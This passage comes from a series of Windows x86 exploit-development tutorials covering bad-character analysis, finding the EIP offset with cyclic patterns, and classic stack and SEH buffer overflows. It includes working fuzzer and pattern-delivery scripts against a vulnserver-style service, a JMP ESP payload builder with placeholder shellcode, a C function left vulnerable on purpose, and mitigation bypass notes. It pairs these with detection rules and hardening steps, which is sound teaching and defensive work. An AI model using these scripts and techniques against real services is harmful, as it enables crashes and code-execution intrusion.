/GS,/SAFESEH,/DYNAMICBASE,/NXCOMPATraise the exploitation bar. - Input validation — allowlist legal characters at the boundary; explicitly reject
\x00,\x0A,\x0D. - WDEG — enforce DEP and CFG per-process via
Set-ProcessMitigation. - Memory integrity — flag executable pages not backed by a known on-disk image.
- Deploy Sysmon with a community baseline (SwiftOnSecurity, olafhartong sysmon-modular) to ensure EID
10capturesCallTrace.

13. Tools for Bad-Character Analysis
| Tool | Description | Link |
|---|---|---|
| Immunity Debugger | Crash analysis, ESP dump inspection | immunityinc.com |
| mona.py | Bytearray generation and memory comparison | github.com/corelan |
| WinDbg | Opcode/gadget inspection, memory diffing | microsoft.com |
| msfvenom | Shellcode generation and encoding (-b) | offsec.com |
| Alpha2 | Standalone alphanumeric shellcode encoder | github.com |
| x64dbg | User-mode debugging and patching | x64dbg.com |
| Ghidra | Static opcode/disassembly analysis | ghidra-sre.org |
| Volatility | Memory forensics, unbacked code regions | volatilityfoundation.org |
14. MITRE ATT&CK Mapping
Bad-char testing and shellcode crafting are pre-exploitation tradecraft with no standalone technique ID — they enable the techniques below.
| Technique | MITRE ID | Detection |
|---|---|---|
| Exploitation for Client Execution | T1203 | Process crash bursts, EID 1 framework launches |
| Exploit Public-Facing Application | T1190 | WAF anomalies, service access violations |
| Exploitation for Privilege Escalation | T1068 | Local overflow → elevated process behavior |
| Obfuscated Files or Information | T1027 | Encoder signatures (shikata/alpha) on disk/wire |
| Process Injection | T1055 | Sysmon EID 8/10, UNKNOWN in CallTrace |
Summary
- Bad characters are application-defined bytes that corrupt, truncate, or transform shellcode before it reaches
EIP— you must enumerate them empirically, never assume. \x00is always bad in string-based overflows because CRT functions likestrcpyandstrlentreat it as the terminator; sockets pass it but downstream string APIs still die on it.- Enumerate with a
\x01–\xFFbyte array, diff memory using!mona compare, and remember only the first byte of a corrupted run is confirmed bad. - Adapt with
msfvenom -bencoding (shikata_ga_nai, falling back tocall4_dword_xororalpha_mixed), jump-opcode substitution, and Venetian shellcode for Unicode buffers. - Detect the resulting payloads via Sysmon Event ID
10withUNKNOWNCallTraceframes, ETWTI injection telemetry, and process-creation auditing (4688).
Related Tutorials
- Shellcode Encoders: XOR Encoding, Custom Decoders, and Avoiding Bad Chars
- Egghunters: Staged Payload Delivery When Buffer Space Is Tight
- Position-Independent Code: Writing PIC Shellcode Without Hardcoded Addresses
- Writing x64 Shellcode: Differences, Shadow Space, and Register Conventions
- Writing Your First Shellcode: x86 Reverse Shell from Scratch
References
- CAPEC-52: Embedding NULL Bytes – MITRE CAPEC
- CWE-158: Improper Neutralization of Null Byte or NUL Character – MITRE CWE
- Exploit Writing Tutorial Part 9: Introduction to Win32 Shellcoding (Bad Characters) – Corelan
- Exploit Writing Tutorial Part 1: Stack Based Overflows (Bad Characters & Restricted Chars) – Corelan
- Embedding Null Code – OWASP Foundation
- Exploiting x86 Stack Based Buffer Overflows (Null Bytes & Shellcode) – Exploit-DB
Finding the EIP Offset: Pattern Creation and Cyclic Patterns
Objective: Understand how to determine the exact EIP overwrite offset in a classic x86 stack-based buffer overflow by sending a cyclic (De Bruijn-derived) pattern, reading the value loaded into EIP at crash time, and calculating the precise byte distance from the buffer’s start to the saved return address — a repeatable, tool-agnostic workflow for authorized lab use.
1. Prerequisites and Lab Setup
This workflow assumes an isolated, authorized lab VM — never a production host. The classic offset-finding exercise targets a purpose-built vulnerable service such as vulnserver.exe or brainpan.exe, attached to a debugger.
You will need:
| Component | Role |
|---|---|
| Immunity Debugger | Attach to the target process and read register state at crash time. |
mona.py | Pattern generation and offset search inside Immunity. |
| Kali + Metasploit | msf-pattern_create / msf-pattern_offset wrappers. |
| Python 3 (+ pwntools) | Scripted fuzzing, pattern delivery, and cyclic() math. |
Attach Immunity to the running service (File → Attach), press F9 to resume, then drive input from your Python script across the network. Configure mona‘s working folder first:
!mona config -set workingfolder c:\mona\%p2. The x86 Stack Frame: Why EIP Is the Target
EIP (Extended Instruction Pointer) is the 32-bit register holding the address of the next instruction. On function return, the ret instruction pops the saved return address off the stack into EIP. If you can overwrite that saved value, you control where execution flows next.
On a standard MSVC/GCC x86 cdecl frame, the layout is:
[ local buffer (N bytes) ] <- lower address, ESP near here on entry
[ saved EBP (4 bytes) ]
[ saved EIP (4 bytes) ] <- overwrite target
[ function arguments ] <- higher addressThe saved EIP sits above the saved EBP in the stack image. The offset is the byte distance from byte 0 of your input buffer to the first byte of saved EIP. ESP matters too: after ret, ESP advances past the popped return address and typically points directly into your attacker-controlled buffer region — the basis for later JMP ESP stages.

3. From Fuzzing to Approximate Crash Size
The prior stage — fuzzing — delivers progressively larger buffers of A bytes (\x41) until the service dies. When the debugger shows EIP = 41414141, the saved return address has been fully overwritten with As. That confirms EIP control but tells you nothing about where in the buffer EIP lands.
import socket, time
ip, port = "192.168.56.10", 9999
size = 100
while True:
try:
with socket.create_connection((ip, port), timeout=5) as s:
buf = b"A" * size
s.send(b"TRUN /.:/" + buf) # protocol-specific prefix
print(f"[*] Sent {size} bytes")
size += 100
time.sleep(1)
except Exception:
print(f"[!] Crash near {size} bytes")
breakRound the crash size up to a clean number — say 2000 bytes. That value becomes the pattern length.
4. The Mathematics of Cyclic Patterns
EIP = 41414141 is ambiguous because every byte is identical. The fix is a cyclic pattern: a string in which every fixed-length substring appears exactly once. Find which substring landed in EIP, and you have the offset.
| Concept | Detail |
|---|---|
| De Bruijn sequence | A sequence where every possible subsequence of a fixed length appears exactly once. This uniqueness is what makes offset lookup deterministic. |
| Why it works | The overwriting bytes are popped into EIP on ret. Because each 4-byte window is unique, the EIP value maps to exactly one position in the input. |
| Metasploit variant | Metasploit patterns use a different algorithm than true De Bruijn but serve the same purpose, drawing from uppercase letters, lowercase letters, and digits. |
| 3-char uniqueness | pattern_create produces a string where every three-character substring is unique: Aa0Aa1Aa2Aa3Aa4.... |
pwntools cyclic() generates a true De Bruijn sequence; msf-pattern_create uses the alphabet-based approach. Both yield a unique mapping you can query.

5. Generating the Pattern: Three Tool Paths
Generate a pattern equal to (or slightly larger than) the crash size. The -l flag is length; the -q flag (next section) is the query value.
Metasploit (Bash):
# Generate a 2000-byte non-repeating pattern
msf-pattern_create -l 2000
# Or the script directly:
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 2000mona.py (Immunity command bar):
!mona pc 2000pwntools (Python 3):
from pwn import *
pattern = cyclic(2000)
print(pattern)Tip: Generate a pattern 400 bytes larger than the crash buffer to also reveal whether shellcode space exists immediately after the EIP overwrite.
6. Sending the Pattern and Capturing the EIP Value
Replace the A buffer in your fuzzing script with the generated pattern, reattach Immunity, and reproduce the crash.
import socket
pattern = b"Aa0Aa1Aa2Aa3Aa4..." # paste msf-pattern_create -l 2000 output
ip, port = "192.168.56.10", 9999
with socket.create_connection((ip, port)) as s:
s.send(b"TRUN /.:/" + pattern)When the process faults, read the 4-byte EIP value from Immunity’s register panel — for example 6F43396E.
Little-endian note: Values are written to the stack least-significant-byte first. A debugger may display the register as
6F43396E. Tools likepattern_offsethandle endianness internally, so pass the displayed value as-is. A manual ASCII lookup, however, requires reversal:6F43396E→6E39436F→n9Co.
7. Calculating the Exact Offset
Feed the EIP value into any of the three tools. All return the same byte distance.
Metasploit (Bash):
# -q is the query switch; pass the EIP value from the debugger
msf-pattern_offset -l 2000 -q 6F43396E
# Output:
# [*] Exact match at offset 1978mona.py (Immunity): findmsp searches every register and the stack against the pattern.
!mona findmsp -distance 2000Read the log line:
EIP contains normal pattern : ... (offset 1978)(!mona po 6F43396E performs the same lookup by hex value.)
pwntools (Python 3): cyclic_find accepts the packed 4-byte value.
from pwn import *
offset = cyclic_find(p32(0x6161616c)) # value read from EIP
print(offset) # -> integer byte offsetgdb-peda‘s pattern_search reports all three at once on Linux targets — e.g. EIP+0 found at offset: 1040 and [ESP] --> offset 1044 — useful for spotting where ESP lands relative to EIP.
8. Verifying EIP Control
Never trust a calculated offset blindly. Confirm it by overwriting EIP with a known marker. Set payload to empty and retn to "BBBB":
import socket
prefix = b"TRUN /.:/"
offset = 1978
overflow = b"A" * offset
retn = b"BBBB" # 0x42424242
payload = b"" # no payload yet — verification only
buf = prefix + overflow + retn + payload
with socket.create_connection(("192.168.56.10", 9999)) as s:
s.send(buf)Reload the app in Immunity and re-send. If the offset is correct, EIP shows 42424242 — the hex of “BBBB”. You now control execution flow exactly. Confirm ESP also points into your buffer; that location holds the bytes that follow retn and becomes your future code-redirect landing zone.
The conceptual stack image after the overwrite:
[ AAAA AAAA ... AAAA ] offset bytes filling buffer + saved EBP
[ BBBB ] saved EIP = 0x42424242 (controlled)
[ CCCC ... ] ESP region (future shellcode space)
9. Common Pitfalls and Edge Cases
- Pattern shorter than the real offset: EIP holds bytes from beyond your pattern; the offset tool returns no match. Regenerate longer.
- Bad characters: Bytes like
\x00,\x0a,\x0dcan truncate or corrupt the pattern mid-stream, shifting EIP unpredictably. Bad-char analysis is a separate stage. - Modern mitigations: ASLR and DEP/NX invalidate the naive EIP→ESP→shellcode chain on hardened targets. The offset still exists, but exploitation requires bypasses (covered in later tutorials).
- SEH-based overflows: When the buffer overruns the Structured Exception Handler instead of the saved return address, EIP may not show pattern bytes directly —
!mona findmspwill instead report the offset to the SEH/nSEH records.
10. Common Attacker Techniques
Offset discovery is a development sub-step that feeds the techniques below.
| Technique | Description |
|---|---|
| Stack buffer overflow | Overrun a fixed local buffer to overwrite the saved return address. |
| Cyclic pattern offset finding | Deterministically locate the EIP overwrite distance, as taught here. |
EIP redirection via JMP ESP | Once the offset is known, replace retn with the address of a JMP/CALL ESP gadget. |
| SEH overwrite | Variant overflow that hijacks the exception handler chain instead of ret. |
11. Defensive Strategies and Detection
Detection splits into two contexts: catching exploitation attempts against a service, and catching the crash-loop behaviour of fuzzing/pattern delivery.
Crash and process telemetry:
- Application Error — Event ID 1000 (Application log): logged on
0xC0000005(Access Violation) when EIP corruption kills the process; the faulting address is the pattern value (e.g.0x41307241). - Windows Error Reporting — Event ID 1001: WER bucket data, faulting instruction pointer, and dump path for post-crash forensics.
- Sysmon Event ID 3 (Network Connection): repeated high-rate TCP connections to a single service port during fuzzing and pattern delivery are anomalous — watch
DestinationPortandSourceIp. - Sysmon Event ID 1 (Process Create): child processes spawned if the overflow reaches code execution — inspect
CommandLine,ParentImage,IntegrityLevel.
ETW providers: Microsoft-Windows-WER-SystemErrorReporting emits access-violation crash events; Microsoft-Windows-Kernel-Process reveals abnormal crash-and-restart loops via process start/stop events. Forward both to a SIEM.
A repeated-crash detection sketch (illustrative):
title: Repeated Application Crash Loop (Possible Buffer Overflow Fuzzing)
logsource:
product: windows
service: application
detection:
selection:
EventID: 1000
ExceptionCode: '0xc0000005' # Access Violation
timeframe: 1m
condition: selection | count() > 5 # repeated crashes = fuzzing indicator
level: highHardening checklist (raises the bar from “find the bug” to “bypass every mitigation”):
- Compile with
/GSstack security cookies — a mismatch triggers__security_check_cookie()and terminates beforeret. - Enable DEP/NX system-wide:
bcdedit /set nx AlwaysOn. - Enable ASLR:
HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\MoveImages = 1. - Compile with Control Flow Guard:
/guard:cf. - Link with SafeSEH (
/SAFESEH) to block SEH overwrites on x86. - Replace unbounded
strcpy,gets,scanf("%s", ...)withstrcpy_s,strncpy_s,gets_s. - Run Application Verifier with heap and stack checks during development.
These map to MITRE mitigation M1050 — Exploit Protection.
12. Tools for Offset Analysis
| Tool | Description | Link |
|---|---|---|
msf-pattern_create / pattern_create.rb | Generate a non-repeating pattern of length -l. | metasploit.com |
msf-pattern_offset / pattern_offset.rb | Query offset with -q <EIP_HEX>. | metasploit.com |
| mona.py | !mona pc, !mona findmsp, !mona po inside Immunity. | github.com |
| Immunity Debugger | Attach, reproduce crash, read EIP/ESP. | immunityinc.com |
| pwntools | cyclic() / cyclic_find() De Bruijn math. | github.com |
| GDB + PEDA | pattern_search reports EBP/EIP/ESP offsets. | github.com |
13. MITRE ATT&CK Mapping
Offset finding is a pre-exploitation development sub-step with no dedicated technique ID; it supports the techniques below.
| Technique | MITRE ID | Detection |
|---|---|---|
| Exploitation for Client Execution | T1203 | Crash telemetry (Event ID 1000), anomalous child processes (Sysmon ID 1). |
| Exploitation for Privilege Escalation | T1068 | Access-violation crashes in privileged services; WER buckets. |
| Exploit Public-Facing Application | T1190 | High-rate TCP to a service port (Sysmon ID 3); crash loops. |
| Exploitation for Defense Evasion | T1211 | Memory-corruption indicators; EDR memory hooks. |
| Exploit Protection (Mitigation) | M1050 | DEP, ASLR, CFG, /GS, SafeSEH. |
Summary
- The EIP offset is the exact byte distance from your buffer’s start to the saved return address — and a cyclic pattern finds it deterministically.
- A De Bruijn / Metasploit pattern makes every fixed-length window unique, so the value popped into EIP maps to a single position.
- Generate with
msf-pattern_create,!mona pc, orcyclic(); resolve withmsf-pattern_offset -q,!mona findmsp, orcyclic_find(). - Verify by overwriting EIP with
"BBBB"and confirmingEIP = 42424242; remember little-endian display order. - Defenders catch the activity via Event ID 1000 (
0xC0000005) crash loops and Sysmon Event ID 3 connection floods; M1050 controls (DEP, ASLR, CFG,/GS) raise the exploitation bar dramatically.
Related Tutorials
- Egghunters: Staged Payload Delivery When Buffer Space Is Tight
- Shellcode Encoders: XOR Encoding, Custom Decoders, and Avoiding Bad Chars
- Position-Independent Code: Writing PIC Shellcode Without Hardcoded Addresses
- Writing x64 Shellcode: Differences, Shadow Space, and Register Conventions
- Writing Your First Shellcode: x86 Reverse Shell from Scratch
References
- Metasploit Unleashed: Writing an Exploit (pattern_create & pattern_offset)
- pwnlib.util.cyclic — Generation of Unique Sequences — pwntools 4.15.0 Documentation
- CAPEC-100: Overflow Buffers (Version 3.9) — MITRE CAPEC
- Exploitation for Client Execution, Technique T1203 — MITRE ATT&CK
- dostackbufferoverflowgood Tutorial (EIP Offset via Cyclic Pattern) — GitHub/justinsteven
- pwnlib.elf.corefile — Core Files (cyclic + EIP offset automation) — pwntools 4.15.0 Documentation
Classic Stack Buffer Overflow: Smashing the Stack on Windows
Objective: Understand how a classic stack-based buffer overflow corrupts a Windows x86 call frame, hijacks the saved
EIP, and redirects execution through aJMP ESPtrampoline — and how/GS, SafeSEH, SEHOP, DEP, and ASLR defeat or complicate it, so you can detect and defend against this vulnerability class in authorized lab work.
1. Windows Memory Layout Primer
Every Windows process runs inside a private virtual address space. On x86 (32-bit), that space spans 0x00000000–0x7FFFFFFF for user mode. The stack grows downward (high to low addresses) and stores function call frames; the heap grows upward and serves dynamic allocations.
The CPU tracks two stack-relevant registers and one execution register:
ESP— stack pointer, the current top of stack.EBP— base/frame pointer, anchors the current frame.EIP— instruction pointer, the address of the next instruction. This is the attacker’s target.
A CALL instruction pushes the return address (the next EIP) onto the stack and jumps to the target. The matching RET pops that saved address back into EIP. If an attacker overwrites the saved return address on the stack, RET transfers control wherever they choose.
x86 is little-endian: the address 0x625011AF is written in the payload as the byte sequence \xAF\x11\x50\x62. This byte ordering matters for every address you place into an exploit buffer.
2. Anatomy of a Stack Frame
A standard cdecl/stdcall function frame is built by the prologue and torn down by the epilogue. Laid out high → low address:
| Stack Slot | Description |
|---|---|
| Function arguments | Pushed by caller before CALL |
Saved EIP (return address) | Pushed implicitly by the CALL instruction |
Saved EBP | Pushed by callee prologue (PUSH EBP) |
/GS stack cookie (if present) | Inserted between locals and saved EBP/EIP |
| Local variables / buffers | Allocated by SUB ESP, N |
← ESP (stack top) | Grows downward |
The prologue and epilogue, with the /GS cookie check shown, look like this:
; --- Prologue ---
push ebp ; save caller frame pointer
mov ebp, esp ; establish new frame
sub esp, 0x40 ; allocate 64 bytes of locals
mov eax, [__security_cookie]
xor eax, ebp ; cookie ^= EBP (frame-tied canary)
mov [ebp-4], eax ; store cookie above locals
; --- Epilogue ---
mov ecx, [ebp-4]
xor ecx, ebp
call __security_check_cookie ; compare vs master; abort on mismatch
mov esp, ebp
pop ebp ; restore caller frame pointer
ret ; pop saved EIP into instruction pointerReading this frame live in WinDbg or x64dbg — inspecting ESP, EBP, and the bytes between locals and the saved return address — is the first skill of exploit development.

3. The Overflow: Why Bounds Checks Matter
The root cause is always the same: a copy operation that writes more bytes into a fixed-size stack buffer than the buffer holds. The classic offenders are CRT functions that perform no bounds checking.
| Identifier | What it does |
|---|---|
strcpy, strcat, gets, sprintf, scanf | Unsafe CRT functions with no bounds checking — classic root causes |
memcpy(dst, src, count) | Copies count bytes regardless of dst size; dangerous when count is attacker-controlled |
Here is the canonical vulnerable pattern defenders must recognize in code review:
#include <string.h>
// DELIBERATELY VULNERABLE — lab use only.
void handle_request(char *attacker_input) {
char buffer[64]; // fixed 64-byte stack buffer
strcpy(buffer, attacker_input); // no length check — overflow
}When attacker_input exceeds 64 bytes, the copy walks past buffer, overwrites the saved EBP, then the saved EIP. Supply a long run of 0x41 ('A') and the program crashes with an access violation as the CPU tries to execute at EIP = 0x41414141. That controlled crash is proof you own the instruction pointer.
When compiled with MSVC /GS- (cookie disabled), the prologue omits the xor/store and the epilogue omits __security_check_cookie entirely — a linear overflow reaches the return address unobstructed. Diffing the /GS vs /GS- disassembly in a debugger is the clearest way to see the cookie.
4. Exploit Development Methodology on Windows
The classic workflow is a tight loop against an intentionally vulnerable target in an isolated VM:
- Fuzz to crash — send increasing-length inputs until the service faults.
- Find the offset — send a cyclic (de Bruijn) pattern, read the value in
EIPat crash, compute the exact distance to the return address. - Confirm EIP control — overwrite with a known marker (
0x42424242) and verify. - Enumerate bad characters — find bytes the protocol mangles (
\x00,\x0a,\x0dare common). - Find a trampoline — locate
JMP ESPin a non-ASLR module. - Build the payload — padding + trampoline address + NOP sled + shellcode.
A minimal network fuzzer:
import socket, time
target = ("192.168.56.20", 9999)
size = 100
while size < 4000:
try:
s = socket.socket()
s.connect(target)
buf = b"TRUN /.:/" + b"A" * size # protocol prefix + payload
s.send(buf)
s.close()
print(f"[+] sent {size} bytes")
size += 200
time.sleep(1)
except Exception:
print(f"[!] crashed at ~{size} bytes")
breakOffset discovery with a cyclic pattern (generated by pwntools or !mona pattern_create):
from pwn import cyclic, cyclic_find
pattern = cyclic(3000) # de Bruijn sequence
# ... send pattern, read EIP from the debugger at crash (e.g. 0x6f43396e) ...
offset = cyclic_find(0x6f43396e) # exact bytes before saved EIP
print(f"[+] EIP offset = {offset}")Bad-character enumeration sends the full byte range and diffs it against memory:
badchar_test = bytes(b for b in range(1, 256)) # skip \x00 first
# Send, then in the debugger: d esp -> compare bytes in memory
# Any byte missing/truncated is a bad char; rebuild excluding it.The final builder assembles the pieces. Note the placeholder shellcode — generate benign calc-popping shellcode with msfvenom in your own lab; never embed working shellcode in a tutorial:
from pwn import p32
offset = 2003
jmp_esp = 0x625011AF # FF E4 in a non-ASLR module
nop_sled = b"\x90" * 16
# shellcode = b"[MSFVENOM_OUTPUT_HERE]" # generated in your lab, -b "\x00\x0a\x0d"
shellcode = b"\x90" * 32 # placeholder
payload = b"A" * offset + p32(jmp_esp) + nop_sled + shellcodeThe key opcodes you search modules for:
| Opcode bytes | Instruction | Use |
|---|---|---|
FF E4 | JMP ESP | Classic return trampoline |
FF D4 | CALL ESP | Equivalent effect |
FF E5 | JMP EBP | When EBP points near the buffer |
EB 06 | Short JMP +6 | Next-SEH jump-over gadget |
Because ESP points at the attacker’s buffer when RET executes, returning into JMP ESP immediately pivots execution into the NOP sled and shellcode.

5. Windows Mitigations Deep-Dive
Modern Windows defaults make the naïve attack above fail. Each mitigation targets a different stage.
| Mitigation | Mechanism | Bypass vector (teaching) |
|---|---|---|
/GS (stack cookie) | Random DWORD cookie between locals and saved EBP/EIP; checked in epilogue | SEH overwrite before the cookie check; cookie leak |
| SafeSEH | PE table of valid SEH handlers; loader validates the handler before dispatch | Trampoline in a module not compiled /SAFESEH |
| SEHOP | Validates the SEH chain reaches FinalExceptionHandler at dispatch | Chain spoofing; non-opted-in modules |
DEP/NX (/NXCOMPAT) | Pages are W^X; the stack is non-executable | ROP chain (follow-on topic) |
ASLR (/DYNAMICBASE) | Randomizes image/stack/heap base | Partial overwrites, info leaks (follow-on topic) |
/GS computes a program-wide master cookie at startup via __security_init_cookie(), stored in the module’s .data section. The prologue copies it onto the stack between the locals and the saved frame pointer; the epilogue runs __security_check_cookie(), which calls __report_gsfailure() on mismatch. Microsoft shipped /GS in Visual Studio 2003 and enabled it by default in 2005. Variable reordering moves arrays and structs to the highest part of the frame so a linear overflow cannot clobber other locals before reaching the cookie.
The original /GS only protected arrays of 8+ elements with element size 1 or 2; the later GS++ expanded coverage to any array and any struct regardless of size. The critical limitation: /GS does not protect exception handler records. DEP and ASLR are not stack-specific — they do not stop the overflow or the EIP hijack; they make running shellcode far harder.

6. SEH-Based Overflow (x86)
On x86, Structured Exception Handling chains live on the stack as linked EXCEPTION_REGISTRATION_RECORD nodes:
typedef struct _EXCEPTION_REGISTRATION_RECORD {
struct _EXCEPTION_REGISTRATION_RECORD *Next; // next handler in chain
PEXCEPTION_ROUTINE Handler; // SE handler function ptr
} EXCEPTION_REGISTRATION_RECORD, *PEXCEPTION_REGISTRATION_RECORD;When a function uses try/except, this record sits on the stack beside the /GS cookie. If the attacker overflows far enough to overwrite both Next SEH and SE Handler, then triggers an exception before the epilogue runs __security_check_cookie(), the OS dispatches to the attacker-controlled handler — bypassing the cookie entirely.
The standard technique overwrites SE Handler with the address of a POP–POP–RET gadget inside a loaded module. At dispatch, the stack arrangement places a pointer to the Next SEH field where RET lands; POP–POP–RET unwinds two slots and returns into the attacker’s Next SEH value, which is typically a short jump (EB 06) over the handler bytes into the shellcode.
SafeSEH breaks this by validating the handler against the PE’s registered-handler table; attackers respond by sourcing the gadget from a module not built with /SAFESEH. SEHOP (default since Vista SP1) walks the chain to confirm it terminates at FinalExceptionHandler, defeating a naively overwritten chain. On 64-bit, exception data is table-based and no longer stored on the stack, so this primitive does not apply.

7. Lab Walkthrough: Exploiting an Intentionally Vulnerable Binary
Perform every step against a purpose-built target — VulnServer, brainpan, or a custom binary compiled with /GS- — inside an isolated VM with no network access to production. The two-phase approach makes the mitigations tangible:
- No-protections build: Compile with
/GS-/NXCOMPAT:NO/DYNAMICBASE:NO. Run the fuzzer (§4), crash the service, find the offset with a cyclic pattern, confirmEIPcontrol, enumerate bad chars, locateJMP ESPwithmona.py, and land in a NOP sled. /GS-only build: Recompile with/GSenabled, replay the same payload, and watch__security_check_cookiedetect the corrupted canary and terminate the process via__report_gsfailure()— the same input that worked now dies in the epilogue.
Reference debugger and mona.py commands:
0:000> g ; run until crash
0:000> r ; read registers — expect EIP = 41414141
0:000> d esp ; dump stack at ESP — find your buffer
0:000> !exploitable ; triage the crash classification
0:000> bp 0x625011AF ; break on the JMP ESP trampoline!mona findmsp ; locate cyclic pattern, report EIP offset
!mona jmp -r esp -cpb "\x00\x0a\x0d" ; find JMP ESP excluding bad chars
!mona bytearray -cpb "\x00" ; generate byte array for badchar diffing8. Common Attacker Techniques
| Technique | Description |
|---|---|
| Linear stack smash | Overflow a buffer to overwrite saved EIP with a JMP ESP trampoline |
| SEH overwrite | Overwrite Next SEH + SE Handler, trigger an exception to bypass /GS |
| Non-SafeSEH trampoline | Source POP–POP–RET / JMP ESP gadgets from modules lacking /SAFESEH |
| Bad-char-safe encoding | Encode shellcode to avoid protocol-mangled bytes (\x00, \x0a, \x0d) |
| Egghunter / staging | Use a small first-stage to locate or download a larger payload |
Post-exploit VirtualProtect | Mark injected memory executable to evade software DEP in legacy scenarios |
In practice the attacker chains these: a SEH overwrite defeats the cookie, a non-SafeSEH gadget defeats SafeSEH, and a ROP stub built from non-ASLR module gadgets defeats DEP before transferring to shellcode.
9. Defensive Strategies & Detection
Sysmon does not emit a “buffer overflow” event. The crash surfaces through Windows Error Reporting, and the post-exploitation behavior surfaces through Sysmon.
- WER Event ID 1000 (
Application Error,Applicationlog) — logs the faulting module,ExceptionCode = 0xC0000005(access violation), faulting offset, and thread ID. A0xC0000005at a non-canonical offset in a network-facing service is high-fidelity. - WER Event ID 1001 — records the crash bucket and any captured dump.
Relevant Sysmon events for follow-on activity:
| Event ID | Name | Relevance |
|---|---|---|
1 | Process Creation | Shells/payloads spawned from a crashed service |
3 | Network Connection | Reverse-shell / C2 egress from shellcode |
7 | Image Loaded | Unexpected ws2_32.dll load by a non-network service |
8 | CreateRemoteThread | Thread injection by shellcode |
10 | Process Access | Shellcode calling OpenProcess on lsass.exe |
11 | File Created | Dropped payloads / second-stage binaries |
25 | Process Tampering | Process hollowing following the overflow |
Useful ETW providers: Microsoft-Windows-WER-Diag (crash diagnostics), Microsoft-Windows-Security-Mitigations (WDEG/Exploit Guard triggers, in /KernelMode and /UserMode channels), and Microsoft-Windows-Kernel-Process. Enable Audit Process Creation (4688) with command-line logging and Audit Process Termination (4689) to catch crash/restart loops.
A conceptual Sigma rule keying on repeated crashes of a network-facing service:
title: Repeated Application Crash on Network-Facing Service
logsource:
product: windows
service: application
detection:
selection:
EventID: 1000
Application|contains: 'vulnservice.exe'
ExceptionCode: '0xc0000005'
condition: selection | count() > 3 by Application within 1m
falsepositives:
- Legitimate software bugs
level: medium
tags:
- attack.initial_access
- attack.T1190Hardening Steps
- Force WDEG / Exploit Protection on network-facing services — mandatory DEP, force-ASLR, SEHOP, heap-spray protection via
Set-ProcessMitigation. - Build with
/GS,/SAFESEH,/DYNAMICBASE,/NXCOMPATand audit your pipeline for them. - Verify SEHOP —
HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\kernel\DisableExceptionChainValidation = 0. - Forward WER Event ID 1000 to the SIEM and alert on repeated crashes of one process.
- Use AddressSanitizer (
/fsanitize=address, MSVC ≥ VS 2019 16.9) in dev/test to catch OOB writes. - Rate-limit oversized inputs at the WAF/NGFW; alert on crash surges.
- Run services least-privilege so successful exploitation yields minimal access.
10. Tools for Stack Overflow Analysis
| Tool | Description | Link |
|---|---|---|
| WinDbg | Kernel/user debugger; !exploitable crash triage | microsoft.com |
| x64dbg | User-mode debugger for live frame inspection | x64dbg.com |
| mona.py | Immunity/WinDbg plugin for offsets, trampolines, bad chars | github.com |
| pwntools | Python exploit-dev framework (cyclic, p32) | pwntools.com |
| ROPgadget | Gadget discovery for DEP-bypass chains | github.com |
| Ghidra | Static disassembly / decompilation for code review | ghidra-sre.org |
| Sysmon | Endpoint telemetry for post-exploitation behavior | microsoft.com |
11. MITRE ATT&CK Mapping
| Technique | MITRE ID | Detection |
|---|---|---|
| Exploit Public-Facing Application | T1190 | WER EventID 1000 crash bursts; WAF oversized-input alerts |
| Exploitation for Privilege Escalation | T1068 | Service running as SYSTEM crashing then spawning children |
| Exploitation for Client Execution | T1203 | Client app (parser/player) crash + child process via Sysmon EventID 1 |
| Endpoint DoS: Application Exploitation | T1499.004 | Repeated crash/restart loops (4689, WER 1000) |
| Exploit Protection (mitigation) | M1050 | DEP/ASLR/SEHOP//GS enforced via WDEG telemetry |
Stack buffer overflow is a vulnerability primitive, not a standalone ATT&CK technique. T1190 and T1068 are the canonical mappings for the adversarial behavior that uses it.
Summary
- A classic stack buffer overflow overwrites the saved return address to hijack
EIPand pivot execution into attacker-controlled shellcode via aJMP ESPtrampoline. - The x86 frame places locals, an optional
/GScookie, savedEBP, and the returnEIPin a predictable order that linear overwrites exploit. /GSinserts a stack canary checked in the epilogue, but does not protect SEH records — the SEH overwrite is the canonical x86 bypass, in turn countered by SafeSEH and SEHOP.- DEP and ASLR do not stop the overflow itself; they force ROP and info-leak techniques to run shellcode.
- Detect via WER
Event ID 1000(0xC0000005) crash bursts plus Sysmon post-exploitation events, and harden with WDEG,/GS/SAFESEH/DYNAMICBASE/NXCOMPAT, SEHOP, and least privilege.
Related Tutorials
- Egghunters: Staged Payload Delivery When Buffer Space Is Tight
- Understanding the Stack: Frames, Prologue/Epilogue, and Stack Layout
- Shellcode Encoders: XOR Encoding, Custom Decoders, and Avoiding Bad Chars
- Position-Independent Code: Writing PIC Shellcode Without Hardcoded Addresses
- Writing x64 Shellcode: Differences, Shadow Space, and Register Conventions
References
- Exploitation for Privilege Escalation, Technique T1068 – Enterprise | MITRE ATT&CK
- Exploit Public-Facing Application, Technique T1190 – Enterprise | MITRE ATT&CK
- /GS (Buffer Security Check) | Microsoft Learn
- Visual C++ Support for Stack-Based Buffer Protection | Microsoft Learn (MSDN Magazine)
- Security Briefs: Protecting Your Code with Visual C++ Defenses | Microsoft Learn
- Security Features in Microsoft Visual C++ | Microsoft C++ Team Blog
Understanding the Stack: Frames, Prologue/Epilogue, and Stack Layout
Objective: Understand how the call stack is organized in x86 and x64 Windows processes — the mechanics of stack frames, function prologue/epilogue sequences, calling conventions, shadow space, and the exact memory layout a debugger reveals — so you can recognize a healthy stack versus a corrupted one and reason precisely about stack-based exploitation and its defenses.
1. Why the Stack Matters for Exploit Development
The stack is the primary battleground for classic memory-safety bugs. Saved return addresses, saved frame pointers, function arguments, and fixed-size local buffers all live side by side on the same contiguous, downward-growing region. When a write runs past the end of a stack buffer, it corrupts the very control-flow data the CPU will trust on the next RET.
For a defender, the same knowledge is diagnostic. A return address pointing into the stack or heap instead of an executable image, an RSP value that jumped thousands of bytes (a stack pivot), or a frame chain that no longer links cleanly are all signatures of corruption. You cannot recognize an abnormal stack until you have internalized a normal one.
2. The Stack as a Data Structure: Growth Direction and Address Space Layout
A Windows process virtual address space holds the mapped image (.text, .data), loaded DLLs, the heap, thread stacks, and per-thread/per-process control structures (TEB/PEB). Each thread receives its own stack, reserved and committed on demand.
The stack grows downward — toward lower addresses. PUSH decrements the stack pointer; POP increments it. The live top of the stack is always tracked by RSP (x64) / ESP (x86).
| Register | Role |
|---|---|
RSP / ESP | Stack pointer — always points to the top (lowest address) of the current frame |
RBP / EBP | Base/frame pointer — anchors the frame in x86; in x64 not used for locals/args unless alloca() is used |
